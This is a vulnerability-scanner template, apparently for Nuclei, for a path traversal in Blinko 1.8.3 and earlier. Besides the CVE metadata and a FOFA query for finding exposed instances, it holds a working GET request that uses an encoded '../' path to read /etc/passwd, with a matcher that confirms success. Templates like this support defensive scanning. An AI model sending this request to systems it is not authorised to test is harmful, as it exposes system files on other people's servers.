id: CVE-2026-23483 info: name: Blinko <= 1.8.3 - Path Traversal via /plugins author: tx1ee severity: medium description: | Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access. impact: | Remote attackers can access arbitrary files outside the intended directory, potentially exposing sensitive data. remediation: | Update to the latest version once available. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-23483 - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2026-23483 epss-score: 0.02152 epss-percentile: 0.84563 cwe-id: CWE-22 metadata: verified: true max-request: 1 vendor: blinko-space product: blinko fofa-query: icon_hash="-1446811182" || icon_hash="-717082057" tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read http: - method: GET path: - "{{BaseURL}}/plugins/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a00463044022077bbebe07b5ab406edb7b45015c4eef7d44909e203475c94bf6cb131ba84db4802204c92f46319bb97dc1479d3274b608cb5a43a0d9727fb2e07e7b17d3b3a75dfe7:922c64590222798bb761d5b6d8e72950